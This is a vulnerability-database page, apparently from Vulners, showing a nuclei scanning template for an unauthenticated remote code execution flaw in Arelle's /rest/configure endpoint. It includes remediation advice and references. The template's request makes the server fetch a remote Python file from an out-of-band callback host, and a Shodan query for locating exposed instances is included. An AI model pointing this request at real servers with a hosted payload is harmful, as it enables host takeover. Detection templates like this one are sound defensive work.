Lucene search
+L

Arelle < 2.39.10 - Remote Code Execution

🗓️ 14 Aug 2026 03:38:04Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 13 Views

Arelle before 2.39.10 enables unauthenticated remote code execution via /rest/configure.

Related
Code
id: CVE-2026-42796

info:
  name: Arelle < 2.39.10 - Remote Code Execution
  author: aryu-ru
  severity: critical
  description: |
    Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the webserver's /rest/configure endpoint. The plugins query parameter is forwarded to the plugin manager without authentication, allowing an attacker to supply a URL to a remote Python file that Arelle downloads and executes within its process.
  impact: |
    Successful exploitation allows an unauthenticated attacker to execute arbitrary Python code with the privileges of the Arelle webserver process, leading to full host compromise.
  remediation: |
    Upgrade to Arelle 2.39.10 or later, which rejects remote URL plug-in references over the webserver.
  reference:
    - https://www.vulncheck.com/advisories/arelle-unauthenticated-rce-via-rest-configure
    - https://github.com/Arelle/Arelle/pull/2320
    - https://github.com/Arelle/Arelle/releases/tag/2.39.10
    - https://nvd.nist.gov/vuln/detail/CVE-2026-42796
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-42796
    epss-score: 0.02415
    epss-percentile: 0.82657
    cwe-id: CWE-306
  metadata:
    verified: true
    max-request: 1
    vendor: arelle
    product: arelle
    shodan-query: http.html:"Arelle Web Services"
  tags: cve,cve2026,arelle,rce,oast,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/rest/configure?plugins=http://{{interactsh-url}}/{{randstr}}.py"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - "Configuration Request"

      - type: status
        status:
          - 200
# digest: 4a0a004730450220190b6120fd3cd067a2458f0706e8036ff5bec1462271111920a47cf7648593ba022100e7c18122b19de7c2bffc4a933f5c3dae72cc31445013cd04c0be6456d80da951:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation